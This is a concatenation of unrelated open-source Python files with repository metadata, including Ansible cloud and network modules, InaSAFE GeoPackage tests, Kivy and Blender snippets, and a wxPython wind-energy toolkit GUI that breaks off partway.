update_mask.append('includedPermissions')
if request.get('stage') != response.get('stage'):
update_mask.append('stage')
return ','.join(update_mask)
def delete(module, link):
auth = GcpSession(module, 'iam')
return return_if_object(module, auth.delete(link))
def resource_to_request(module):
request = {
u'name': module.params.get('name'),
u'title': module.params.get('title'),
u'description': module.params.get('description'),
u'includedPermissions': module.params.get('included_permissions'),
u'stage': module.params.get('stage'),
}
return_vals = {}
for k, v in request.items():
if v or v is False:
return_vals[k] = v
return return_vals
def fetch_resource(module, link, allow_not_found=True):
auth = GcpSession(module, 'iam')
return return_if_object(module, auth.get(link), allow_not_found)
def self_link(module):
return "https://iam.googleapis.com/v1/projects/{project}/roles/{name}".format(**module.params)
def collection(module):
return "https://iam.googleapis.com/v1/projects/{project}/roles".format(**module.params)
def return_if_object(module, response, allow_not_found=False):
# If not found, return nothing.
if allow_not_found and response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError):
module.fail_json(msg="Invalid JSON response with error: %s" % response.text)
result = decode_response(result, module)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
return result
def is_different(module, response):
request = resource_to_request(module)
response = response_to_hash(module, response)
request = decode_response(request, module)
# Remove all output-only from response.
response_vals = {}
for k, v in response.items():
if k in request:
response_vals[k] = v
request_vals = {}
for k, v in request.items():
if k in response:
request_vals[k] = v
return GcpRequest(request_vals) != GcpRequest(response_vals)
# Remove unnecessary properties from the response.
# This is for doing comparisons with Ansible's current parameters.
def response_to_hash(module, response):
return {
u'name': response.get(u'name'),
u'title': response.get(u'title'),
u'description': response.get(u'description'),
u'includedPermissions': response.get(u'includedPermissions'),
u'stage': response.get(u'stage'),
u'deleted': response.get(u'deleted'),
}
def resource_to_create(module):
role = resource_to_request(module)
del role['name']
return {'roleId': module.params['name'], 'role': role}
def decode_response(response, module):
if 'name' in response:
response['name'] = response['name'].split('/')[-1]
return response
if __name__ == '__main__':
main()
| t794104/ansible | lib/ansible/modules/cloud/google/gcp_iam_role.py | Python | gpl-3.0 | 9,028 |
class Token:
"""
Class representing a token.
kind: the kind of token, e.g. filename, number, other
value: specific instance value, e.g. "/tmp/foo.c", or 5
offset: byte offset from start of parse string
"""
def __init__(self, kind, value=None, offset=None):
self.offset = offset
self.kind = kind
self.value = value
def __eq__(self, o):
""" '==', but it's okay if offset is different"""
if isinstance(o, Token):
# Both are tokens: compare kind and value
# It's okay if offsets are different
return (self.kind == o.kind)
else:
return self.kind == o
def __repr__(self):
return str(self.kind)
def __repr1__(self, indent, sib_num=''):
return self.format(line_prefix=indent, sib_num=sib_num)
def __str__(self):
return self.format(line_prefix='')
def format(self, line_prefix='', sib_num=None):
if sib_num:
sib_num = "%d." % sib_num
else:
sib_num = ''
prefix = ('%s%s' % (line_prefix, sib_num))
offset_opname = '%5s %-10s' % (self.offset, self.kind)
if not self.value:
return "%s%s" % (prefix, offset_opname)
return "%s%s %s" % (prefix, offset_opname, self.value)
def __hash__(self):
return hash(self.kind)
def __getitem__(self, i):
raise IndexError
| rocky/python3-trepan | trepan/processor/parse/tok.py | Python | gpl-3.0 | 1,426 |
# -*- coding: utf-8 -*-
#
# license.py
#
# Выводит окно с текстом лицензии.
#
import os
from kivy.clock import Clock
from kivy.uix.rst import RstDocument
from libs.uix.dialogs import dialog, card
class ShowLicense(object):
def show_license(self, *args):
def choice_language_license(on_language):
window = dialog(text=self.data.string_lang_wait, title=self.title)
Clock.schedule_once(
lambda *args: show_license(window, on_language), 0
)
choice_dialog.dismiss()
def show_license(dialog, on_language):
path_to_license = '{}/license/license_{}.rst'.format(
self.directory, self.data.dict_language[on_language]
)
if not os.path.exists(path_to_license):
dialog(text=self.data.string_lang_not_license, title=self.title)
dialog.dismiss()
return
text_license = open(path_to_license).read()
widget_license = RstDocument(
text=text_license, background_color=self.data.alpha,
underline_color=self.data.underline_rst_color
)
card(widget_license, size=(.9, .8))
dialog.dismiss()
choice_dialog = dialog(
text=self.data.string_lang_prev_license, title=self.title,
buttons=[
[self.data.string_lang_on_russian,
lambda *x: choice_language_license(self.data.string_lang_on_russian)],
[self.data.string_lang_on_english,
lambda *x: choice_language_license(self.data.string_lang_on_english)]
]
)
| Dezmonius/Deslium | Deslium Software/Deslium Hestia/master/libs/programclass/show_license.py | Python | gpl-3.0 | 1,705 |
props.bf_Shank_Dia = 5.0
#props.bf_Pitch = 0.8 # Coarse
props.bf_Pitch = 0.5 # Fine
props.bf_Crest_Percent = 10
props.bf_Root_Percent = 10
props.bf_Major_Dia = 5.0
props.bf_Minor_Dia = props.bf_Major_Dia - (1.082532 * props.bf_Pitch)
props.bf_Hex_Head_Flat_Distance = 8.0
props.bf_Hex_Head_Height = 3.5
props.bf_Cap_Head_Dia = 8.5
props.bf_Cap_Head_Height = 5.0
props.bf_CounterSink_Head_Dia = 10.4
props.bf_Allen_Bit_Flat_Distance = 4.0
props.bf_Allen_Bit_Depth = 2.5
props.bf_Pan_Head_Dia = 9.5
props.bf_Dome_Head_Dia = 9.5
props.bf_Philips_Bit_Dia = props.bf_Pan_Head_Dia * (1.82 / 5.6)
#props.bf_Phillips_Bit_Depth = Get_Phillips_Bit_Height(props.bf_Philips_Bit_Dia)
props.bf_Hex_Nut_Height = 4.0
props.bf_Hex_Nut_Flat_Distance = 8.0
props.bf_Thread_Length = 10
props.bf_Shank_Length = 0.0
| cschenck/blender_sim | fluid_sim_deps/blender-2.69/2.69/scripts/addons/add_mesh_BoltFactory/presets/M5.py | Python | gpl-3.0 | 795 |
# ------------------------------------------------------------------
# Copyright (c) 2020 PyInstaller Development Team.
#
# This file is distributed under the terms of the GNU General Public
# License (version 2.0 or later).
#
# The full license is available in LICENSE.GPL.txt, distributed with
# this software.
#
# SPDX-License-Identifier: GPL-2.0-or-later
# ------------------------------------------------------------------
hiddenimports = ["sql_mar"]
| etherkit/OpenBeacon2 | macos/venv/lib/python3.8/site-packages/_pyinstaller_hooks_contrib/hooks/stdhooks/hook-gadfly.py | Python | gpl-3.0 | 458 |
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# (c) 2016 Red Hat Inc.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import env_fallback, return_values
from ansible.module_utils.network_common import to_list, EntityCollection
from ansible.module_utils.connection import Connection
_DEVICE_CONFIGS = {}
_CONNECTION = None
asa_argument_spec = {
'host': dict(),
'port': dict(type='int'),
'username': dict(fallback=(env_fallback, ['ANSIBLE_NET_USERNAME'])),
'password': dict(fallback=(env_fallback, ['ANSIBLE_NET_PASSWORD']), no_log=True),
'ssh_keyfile': dict(fallback=(env_fallback, ['ANSIBLE_NET_SSH_KEYFILE']), type='path'),
'authorize': dict(fallback=(env_fallback, ['ANSIBLE_NET_AUTHORIZE']), type='bool'),
'auth_pass': dict(fallback=(env_fallback, ['ANSIBLE_NET_AUTH_PASS']), no_log=True),
'timeout': dict(type='int'),
'provider': dict(type='dict'),
'context': dict()
}
command_spec = {
'command': dict(key=True),
'prompt': dict(),
'answer': dict()
}
def get_argspec():
return asa_argument_spec
def check_args(module):
provider = module.params['provider'] or {}
for key in asa_argument_spec:
if key not in ['provider', 'authorize'] and module.params[key]:
module.warn('argument %s has been deprecated and will be removed in a future version' % key)
if provider:
for param in ('auth_pass', 'password'):
if provider.get(param):
module.no_log_values.update(return_values(provider[param]))
def get_connection(module):
global _CONNECTION
if _CONNECTION:
return _CONNECTION
_CONNECTION = Connection(module)
context = module.params['context']
if context:
if context == 'system':
command = 'changeto system'
else:
command = 'changeto context %s' % context
_CONNECTION.get(command)
return _CONNECTION
def to_commands(module, commands):
assert isinstance(commands, list), 'argument must be of type <list>'
transform = EntityCollection(module, command_spec)
commands = transform(commands)
for index, item in enumerate(commands):
if module.check_mode and not item['command'].startswith('show'):
module.warn('only show commands are supported when using check '
'mode, not executing `%s`' % item['command'])
return commands
def run_commands(module, commands, check_rc=True):
commands = to_commands(module, to_list(commands))
connection = get_connection(module)
responses = list()
for cmd in commands:
out = connection.get(**cmd)
responses.append(to_text(out, errors='surrogate_then_replace'))
return responses
def get_config(module, flags=[]):
cmd = 'show running-config '
cmd += ' '.join(flags)
cmd = cmd.strip()
try:
return _DEVICE_CONFIGS[cmd]
except KeyError:
conn = get_connection(module)
out = conn.get(cmd)
cfg = to_text(out, errors='surrogate_then_replace').strip()
_DEVICE_CONFIGS[cmd] = cfg
return cfg
def load_config(module, config):
conn = get_connection(module)
conn.edit_config(config)
def get_defaults_flag(module):
rc, out, err = exec_command(module, 'show running-config ?')
out = to_text(out, errors='surrogate_then_replace')
commands = set()
for line in out.splitlines():
if line:
commands.add(line.strip().split()[0])
if 'all' in commands:
return 'all'
else:
return 'full'
| leki75/ansible | lib/ansible/module_utils/asa.py | Python | gpl-3.0 | 5,158 |
# coding=utf-8
"""
InaSAFE Disaster risk assessment tool by AusAid - **Clipper test suite.**
Contact : ole.moller.nielsen@gmail.com
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
import unittest
import sys
from tempfile import mktemp
from qgis.core import QgsVectorLayer, QgsRasterLayer
from PyQt4.QtCore import QFileInfo
from osgeo import gdal
from safe.test.utilities import (
get_qgis_app,
load_test_vector_layer,
standard_data_path)
QGIS_APP, CANVAS, IFACE, PARENT = get_qgis_app()
from safe.datastore.geopackage import GeoPackage
# Decorator for expecting fails in windows but not other OS's
# Probably we should move this somewhere in utils for easy re-use...TS
def expect_failure_in_windows(exception):
"""Marks test to expect a fail in windows - call assertRaises internally.
..versionadded:: 4.0.0
"""
def test_decorator(fn):
def test_decorated(self, *args, **kwargs):
if sys.platform.startswith('win'):
self.assertRaises(exception, fn, self, *args, **kwargs)
return test_decorated
return test_decorator
class TestGeoPackage(unittest.TestCase):
"""Test the GeoPackage datastore."""
def setUp(self):
pass
def tearDown(self):
pass
@unittest.skipIf(
int(gdal.VersionInfo('VERSION_NUM')) < 2000000,
'GDAL 2.0 is required for geopackage.')
def test_create_geopackage(self):
"""Test if we can store geopackage."""
# Create a geopackage from an empty file.
path = QFileInfo(mktemp() + '.gpkg')
self.assertFalse(path.exists())
data_store = GeoPackage(path)
path.refresh()
self.assertTrue(path.exists())
# Let's add a vector layer.
layer_name = 'flood_test'
layer = standard_data_path('hazard', 'flood_multipart_polygons.shp')
vector_layer = QgsVectorLayer(layer, 'Flood', 'ogr')
result = data_store.add_layer(vector_layer, layer_name)
self.assertTrue(result[0])
# We should have one layer.
layers = data_store.layers()
self.assertEqual(len(layers), 1)
self.assertIn(layer_name, layers)
# Add the same layer with another name.
layer_name = 'another_vector_flood'
result = data_store.add_layer(vector_layer, layer_name)
self.assertTrue(result[0])
# We should have two layers.
layers = data_store.layers()
self.assertEqual(len(layers), 2)
self.assertIn(layer_name, layers)
# Test the URI of the new layer.
expected = path.absoluteFilePath() + '|layername=' + layer_name
self.assertEqual(data_store.layer_uri(layer_name), expected)
# Test a fake layer.
self.assertIsNone(data_store.layer_uri('fake_layer'))
# Test to add a raster
layer_name = 'raster_flood'
layer = standard_data_path('hazard', 'classified_hazard.tif')
raster_layer = QgsRasterLayer(layer, layer_name)
result = data_store.add_layer(raster_layer, layer_name)
self.assertTrue(result[0])
# We should have 3 layers inside.
layers = data_store.layers()
self.assertEqual(len(layers), 3)
# Check the URI for the raster layer.
expected = 'GPKG:' + path.absoluteFilePath() + ':' + layer_name
self.assertEqual(data_store.layer_uri(layer_name), expected)
# Add a second raster.
layer_name = 'big raster flood'
self.assertTrue(data_store.add_layer(raster_layer, layer_name))
self.assertEqual(len(data_store.layers()), 4)
# Test layer without geometry
layer = load_test_vector_layer(
'gisv4', 'impacts', 'exposure_summary_table.csv')
tabular_layer_name = 'breakdown'
result = data_store.add_layer(layer, tabular_layer_name)
self.assertTrue(result[0])
@unittest.skipIf(
int(gdal.VersionInfo('VERSION_NUM')) < 2000000,
'GDAL 2.0 is required for geopackage.')
@expect_failure_in_windows(AssertionError)
def test_read_existing_geopackage(self):
"""Test we can read an existing geopackage."""
path = standard_data_path('other', 'jakarta.gpkg')
import os
path = os.path.normpath(os.path.normcase(os.path.abspath(path)))
geopackage = QFileInfo(path)
data_store = GeoPackage(geopackage)
# We should have 3 layers in this geopackage.
self.assertEqual(len(data_store.layers()), 3)
# Test we can load a vector layer.
roads = QgsVectorLayer(
data_store.layer_uri('roads'),
'Test',
'ogr'
)
self.assertTrue(roads.isValid())
# Test we can load a raster layers.
# This currently fails on windows...
# So we have decorated it with expected fail on windows
# Should pass on other platforms.
path = data_store.layer_uri('flood')
flood = QgsRasterLayer(path, 'flood')
self.assertTrue(flood.isValid())
if __name__ == '__main__':
unittest.main()
| Gustry/inasafe | safe/datastore/test/test_geopackage.py | Python | gpl-3.0 | 5,299 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
################################################################################
# gwindetk.py #
# #
# Part of UMass Amherst's Wind Energy Engineering Toolbox of Mini-Codes #
# (or Mini-Codes for short) #
# #
# Python code by Alec Koumjian - akoumjian@gmail.com #
# #
# This code adapted from the original Visual Basic code at #
# http://www.ceere.org/rerl/projects/software/mini-code-overview.html #
# #
# These tools can be used in conjunction with the textbook #
# "Wind Energy Explained" by J.F. Manwell, J.G. McGowan and A.L. Rogers #
# http://www.ceere.org/rerl/rerl_windenergytext.html #
# #
################################################################################
# Copyright 2009 Alec Koumjian #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
import wxversion
wxversion.select('2.8')
import wx
import wx.lib.intctrl as intctrl
import wxmpl
import os
import analysis
import synthesis
import file_ops
class MyFrame(wx.Frame):
def __init__(self, *args, **kwds):
# begin wxGlade: MyFrame.__init__
kwds["size"] = (800, 600)
kwds["style"] = wx.DEFAULT_FRAME_STYLE
wx.Frame.__init__(self, *args, **kwds)
self.active_timeseries = {}
self.__create_objects()
self.__set_properties()
self.__do_layout()
self.__set_bindings()
self.sync_active_listbox()
def __create_objects(self):
# Menu Bar
self.frame_1_menubar = wx.MenuBar()
# File menu
self.file_menu = wx.Menu()
self.import_file = wx.MenuItem(self.file_menu, -1, "Import", "Import timeseries from data file")
self.file_menu.AppendItem(self.import_file)
self.frame_1_menubar.Append(self.file_menu, "File")
# Help Menu
self.help_menu = wx.Menu()
self.help_book = wx.MenuItem(self.help_menu, -1, "Help Index", "How to use this software.")
self.about = wx.MenuItem(self.help_menu, -1, "About","About this software.")
self.help_menu.AppendItem(self.about)
self.frame_1_menubar.Append(self.help_menu, "Help")
# Set Menu Bar
self.SetMenuBar(self.frame_1_menubar)
# Menu Bar end
# Status Bar
self.frame_1_statusbar = self.CreateStatusBar(1, 0)
# Status Bar end
# Tool Bar
self.frame_1_toolbar = wx.ToolBar(self, -1, style=wx.TB_HORIZONTAL|wx.TB_3DBUTTONS)
self.SetToolBar(self.frame_1_toolbar)
self.frame_1_toolbar.AddLabelTool(wx.NewId(), "new", wx.Bitmap("stock_new.png", wx.BITMAP_TYPE_ANY), wx.NullBitmap, wx.ITEM_NORMAL, "", "")
self.frame_1_toolbar.AddLabelTool(wx.NewId(), "open", wx.Bitmap("stock_open.png", wx.BITMAP_TYPE_ANY), wx.NullBitmap, wx.ITEM_NORMAL, "", "")
self.frame_1_toolbar.AddLabelTool(wx.NewId(), "save", wx.Bitmap("stock_save.png", wx.BITMAP_TYPE_ANY), wx.NullBitmap, wx.ITEM_NORMAL, "", "")
self.frame_1_toolbar.AddLabelTool(wx.NewId(), "exit", wx.Bitmap("stock_exit.png", wx.BITMAP_TYPE_ANY), wx.NullBitmap, wx.ITEM_NORMAL, "", "")
# Tool Bar end
# Top level sizers
self.sizer_1 = wx.BoxSizer(wx.HORIZONTAL)
self.sizer_3 = wx.BoxSizer(wx.VERTICAL)
# Splitter
self.splitter = wx.SplitterWindow(self, -1, style=wx.SP_3DSASH|wx.SP_3DBORDER)
# TS panel widgets
self.sizer_ts = wx.BoxSizer(wx.VERTICAL)
self.sizer_control_ts = wx.BoxSizer(wx.HORIZONTAL)
self.ts_control_panel = wx.Panel(self.splitter, -1)
self.list_box_1 = wx.ListBox(self.ts_control_panel, -1, choices=[], style=wx.LB_MULTIPLE|wx.LB_NEEDED_SB)
self.ts_plot_button = wx.Button(self.ts_control_panel, -1, 'Plot Timeseries')
self.ts_remove_button = wx.Button(self.ts_control_panel, -1, 'Remove')
# Notebook
self.notebook_1 = wx.Notebook(self.splitter, -1, style=wx.NB_LEFT)
self.notebook_1_pane_1 = wx.Panel(self.notebook_1, -1)
self.notebook_1_pane_2 = wx.Panel(self.notebook_1, -1)
self.notebook_1_pane_3 = wx.Panel(self.notebook_1, -1)
self.notebook_1_pane_4 = wx.Panel(self.notebook_1, -1)
self.notebook_1_pane_5 = wx.Panel(self.notebook_1, -1)
self.notebook_1_pane_6 = wx.Panel(self.notebook_1, -1)
# Text results panel
self.results_panel = wx.Panel(self, -1, style=wx.SIMPLE_BORDER)
self.results_panel_text = wx.StaticText(self.results_panel, -1, label="Numerical Results Here")
# Graphing panel
self.plot_panel = wxmpl.PlotPanel(self, -1)
# Analysis widgets
self.analysis_sizer = wx.BoxSizer(wx.VERTICAL)
self.stat_button = wx.Button(self.notebook_1_pane_1, -1, 'Statistics')
self.hist_button = wx.Button(self.notebook_1_pane_1, -1, 'Histogram')
self.weibull_button = wx.Button(self.notebook_1_pane_1, -1, 'Weibull Params')
self.corr_button = wx.Button(self.notebook_1_pane_1, -1, 'Correlate')
self.corr_panel = wx.Panel(self.notebook_1_pane_1, -1, style=wx.RAISED_BORDER)
self.corr_panel_btn = wx.Button(self.notebook_1_pane_1, -1, '>>', name='corr')
self.corr_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.rad_autocorr = wx.RadioButton(self.corr_panel, -1, 'Auto', style=wx.RB_GROUP)
self.rad_crosscorr = wx.RadioButton(self.corr_panel, -1, 'Cross')
self.corr_lag_int = intctrl.IntCtrl(self.corr_panel, -1, value=15, min=0)
self.lag_label = wx.StaticText(self.corr_panel, -1, 'No. lags')
self.block_button = wx.Button(self.notebook_1_pane_1, -1, 'Block Average')
self.block_panel = wx.Panel(self.notebook_1_pane_1, -1, style=wx.RAISED_BORDER)
self.block_panel_btn = wx.Button(self.notebook_1_pane_1, -1, '>>', name='block')
self.block_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.block_new_freq = wx.Choice(self.block_panel, -1, choices=['YEARLY','QUARTERLY','MONTHLY','WEEKLY','DAILY','HOURLY','MINUTELY'])
self.psd_button = wx.Button(self.notebook_1_pane_1, -1, 'Power Spectral Density')
# End Analysis widgets
# Synthesis widgets
self.synthesis_sizer = wx.BoxSizer(wx.VERTICAL)
self.arma_button = wx.Button(self.notebook_1_pane_2, -1, 'ARMA')
self.arma_panel = wx.Panel(self.notebook_1_pane_2, -1, style=wx.RAISED_BORDER)
self.arma_panel_btn = wx.Button(self.notebook_1_pane_2, -1, '>>', name='arma')
self.arma_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.mean_lbl = wx.StaticText(self.arma_panel, -1, 'Mean:')
self.stdev_lbl = wx.StaticText(self.arma_panel, -1, 'STDEV:')
self.npoints_lbl = wx.StaticText(self.arma_panel, -1, 'No. points:')
self.autocorr_lbl = wx.StaticText(self.arma_panel, -1, 'Autocorr:')
self.mean_ctrl = wx.TextCtrl(self.arma_panel, -1, '')
self.stdev_ctrl = wx.TextCtrl(self.arma_panel, -1, '')
self.npoints_ctrl = wx.TextCtrl(self.arma_panel, -1, '')
self.autocorr_ctrl = wx.TextCtrl(self.arma_panel, -1, '')
# End Synthesis widgets
# Aerodyn widgets
# End Aerodyn widgets
# Mechanics widgets
# End Mechanics widgets
def __set_properties(self):
# begin wxGlade: MyFrame.__set_properties
self.SetTitle("Wind Energy Engineering Toolkit")
_icon = wx.EmptyIcon()
_icon.CopyFromBitmap(wx.Bitmap("wec.ico", wx.BITMAP_TYPE_ANY))
self.SetIcon(_icon)
self.frame_1_statusbar.SetStatusWidths([-1])
# statusbar fields
frame_1_statusbar_fields = ["The Minicodes at your service!"]
for i in range(len(frame_1_statusbar_fields)):
self.frame_1_statusbar.SetStatusText(frame_1_statusbar_fields[i], i)
self.frame_1_toolbar.Realize()
def __do_layout(self):
# begin wxGlade: MyFrame.__do_layout
# Graph/plot panel
self.plot_panel.SetMinSize((50,50))
# Results panel
self.results_panel_text.Move((20,10))
# Add Notebook pages
self.notebook_1.AddPage(self.notebook_1_pane_1, "Analysis")
self.notebook_1.AddPage(self.notebook_1_pane_2, "Synthesis")
self.notebook_1.AddPage(self.notebook_1_pane_3, "Rotor")
self.notebook_1.AddPage(self.notebook_1_pane_4, "Electrical")
self.notebook_1.AddPage(self.notebook_1_pane_5, "Dynamics")
self.notebook_1.AddPage(self.notebook_1_pane_6, "System")
# Analysis layout
self.corr_sizer.Add(self.corr_button,1)
self.corr_sizer.Add(self.corr_panel_btn,0)
self.block_sizer.Add(self.block_button,1)
self.block_sizer.Add(self.block_panel_btn,0)
self.analysis_sizer.AddMany(((self.stat_button),(self.hist_button),
(self.weibull_button),(self.corr_sizer),
(self.corr_panel),
(self.block_sizer),(self.block_panel),
(self.psd_button)))
button_size = (180,30)
self.stat_button.SetMinSize(button_size)
self.hist_button.SetMinSize(button_size)
self.weibull_button.SetMinSize(button_size)
## corr panel layout
self.corr_button.SetMinSize(button_size)
self.corr_panel_btn.SetMinSize((40,30))
self.corr_panel.Hide()
self.rad_autocorr.Move((10,3))
self.rad_crosscorr.Move((75,3))
self.lag_label.Move((150,5))
self.corr_lag_int.Move((210,0))
self.corr_lag_int.SetSize((40,-1))
self.notebook_1_pane_1.SetSizer(self.analysis_sizer)
## / corr panel layout
## block panel
self.block_button.SetMinSize(button_size)
self.block_panel_btn.SetMinSize((40,30))
# self.block_new_freq.SetMinSize((50, -1))
self.block_new_freq.Move((30,0))
# self.block_new_freq.SetSize((60,-1))
self.block_panel.Hide()
## / block panel
self.psd_button.SetMinSize(button_size)
# End Analysis layout
# Synthesis Layout
self.arma_sizer.Add(self.arma_button,1)
self.arma_sizer.Add(self.arma_panel_btn,0)
self.synthesis_sizer.AddMany(((self.arma_sizer),(self.arma_panel)))
self.arma_button.SetMinSize(button_size)
self.arma_panel_btn.SetMinSize((40,30))
self.arma_panel.Hide()
self.mean_lbl.Move((10,10))
self.stdev_lbl.Move((60,10))
self.npoints_lbl.Move((110,10))
self.autocorr_lbl.Move((190, 10))
self.mean_ctrl.SetSize((30,-1))
self.stdev_ctrl.SetSize((30,-1))
self.npoints_ctrl.SetSize((30,-1))
self.autocorr_ctrl.SetSize((30,-1))
self.mean_ctrl.Move((10,30))
self.stdev_ctrl.Move((60,30))
self.npoints_ctrl.Move((110,30))
self.autocorr_ctrl.Move((190,30))
self.arma_button.Move((10,60))
self.notebook_1_pane_2.SetSizer(self.synthesis_sizer)
# End Synthesis Layout
# TS panel
self.sizer_ts.Add(self.list_box_1, 1, wx.EXPAND, 0)
self.sizer_ts.Add(self.sizer_control_ts, 0)
self.sizer_control_ts.Add(self.ts_plot_button, 0)
self.sizer_control_ts.Add(self.ts_remove_button, 0)
self.ts_control_panel.SetSizer(self.sizer_ts)
# Splitter layout
self.splitter.SetMinimumPaneSize(50)
self.splitter.SplitHorizontally(self.ts_control_panel, self.notebook_1, sashPosition=-300)
# Top level sizers
self.sizer_3.Add(self.plot_panel, 1, wx.EXPAND, 1)
self.sizer_3.Add(self.results_panel, 1, wx.EXPAND, 0)
self.sizer_1.Add(self.splitter, 1, wx.EXPAND)
self.sizer_1.Add(self.sizer_3, 1, wx.EXPAND, 0)
self.SetSizer(self.sizer_1)
self.Layout()
def __set_bindings(self):
"""Bind events to actions."""
# Menu Operations
self.Bind(wx.EVT_MENU, self.OnImport, self.import_file)
self.Bind(wx.EVT_MENU, self.OnAboutBox, self.about)
self.Bind(wx.EVT_MENU, self.OnHelpIndex, self.help_book)
# End File Operations
# TS Panel Bindings
self.Bind(wx.EVT_BUTTON, self.OnPlotTSButton, self.ts_plot_button)
self.Bind(wx.EVT_BUTTON, self.OnRemoveTSButton, self.ts_remove_button)
# Analysis
self.Bind(wx.EVT_BUTTON, self.OnStatButton, self.stat_button)
self.Bind(wx.EVT_BUTTON, self.OnHistButton, self.hist_button)
self.Bind(wx.EVT_BUTTON, self.OnWeibullButton, self.weibull_button)
self.Bind(wx.EVT_BUTTON, self.OnCorrButton, self.corr_button)
self.Bind(wx.EVT_BUTTON, self.OnBlockButton, self.block_button)
self.Bind(wx.EVT_BUTTON, self.OnPSDButton, self.psd_button)
self.Bind(wx.EVT_BUTTON, self.OnTogglePanelButton, self.corr_panel_btn)
self.Bind(wx.EVT_BUTTON, self.OnTogglePanelButton, self.block_panel_btn)
# End Analysis
# Synthesis
self.Bind(wx.EVT_BUTTON, self.OnARMAButton, self.arma_button)
self.Bind(wx.EVT_BUTTON, self.OnTogglePanelButton, self.arma_panel_btn)
# Utility functions
def valid_selections(self, allowed_number):
"""
Checks number of selections in self.list_box_1
Input: allowed_number (int) is number of allowed selections
Output: MsgDialog if incorrect number, else passes returns True
"""
index = self.list_box_1.GetSelections()
message = "Please select exactly %s timeseries"
if len(index) != allowed_number:
dlg = wx.MessageDialog(self, message % (allowed_number), "Invalid Input", wx.OK)
dlg.ShowModal()
dlg.Destroy()
return False
else:
return True
def renumber_active_timeseries(self):
"""Renumber timeseries in active_timeseries dictionary."""
index = 0
new_dict = {}
for key, value in self.active_timeseries.iteritems():
new_dict[index] = value
index += 1
self.active_timeseries = new_dict
def sync_active_listbox(self):
"""Synchronize listbox to active_timeseries values."""
self.list_box_1.Clear()
string_list = []
## Add text to listbox
for index, value in self.active_timeseries.iteritems():
string_list.append(' '.join([str(index),str(value['name']),str(value['location']),str(value['timeseries'][0:3])]))
self.list_box_1.Set(string_list)
def refresh_timeseries(self):
"""Renumber and sync active ts to listbox."""
self.renumber_active_timeseries()
self.sync_active_listbox()
def add_timeseries(self, timeseries_dict):
"""Add a timeseries dictionary (metadata + ts) to active_timeseries"""
self.active_timeseries[len(self.active_timeseries)] = timeseries_dict
def remove_timeseries(self, index):
"""Remove timeseries from active list"""
self.active_timeseries.pop(index)
def create_ts_dict(self, new_ts, old_ts_dict=False, prepend_str=''):
"""
Place new timeseries inside meta_ts_dict, copy meta if applicable.
Input: new timeseries
Optional: old timeseries for meta_data, prepend string
Output: new meta + ts dictionary
"""
if old_ts_dict:
new_ts_dict = old_ts_dict.copy()
new_ts_dict['timeseries'] = new_ts
new_ts_dict['name'] = prepend_str+old_ts_dict['name']
else:
new_ts_dict = {'elevation': 00, 'name': '',
'designation': 'primary', 'collector': 'synthetic','filters': {},
'comments': 'Generated with Wind Energy Engineering Toolkit',
'meters_above_ground': 0, 'site_name': 'None', 'coords': {},
'location': 'none', 'time_step': 600, 'units': 'units',
'timezone': 0, 'time_period': '','logger_sampling': 0,
'type': 'synthetic', 'report_created': '2001-01-01'}
new_ts_dict['timeseries'] = new_ts
new_ts_dict['name'] = prepend_str+'synthetic'
return new_ts_dict
# End Utility functions
# Handler functions
## Menu Operations
def OnImport(self, event):
"""Import all timeseries from a *.dat file"""
dlg = wx.FileDialog(self, "Choose a file", os.getcwd(), "", "Dat files|*.dat|Any files|*.*", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
open_file = open(dlg.GetPath(), 'rb')
meta_ts_dict = file_ops.parse_file(open_file)
open_file.close()
for meta_ts in meta_ts_dict.values():
self.add_timeseries(meta_ts)
self.refresh_timeseries()
# Set statusbar text
mypath = os.path.basename(dlg.GetPath())
self.SetStatusText("You imported: %s" % mypath)
def OnHelpIndex(self, event):
return 0
def OnAboutBox(self, event):
description = """The Wind Energy Engineering Toolkit (aka Minicodes) is a set of functions designed to..."""
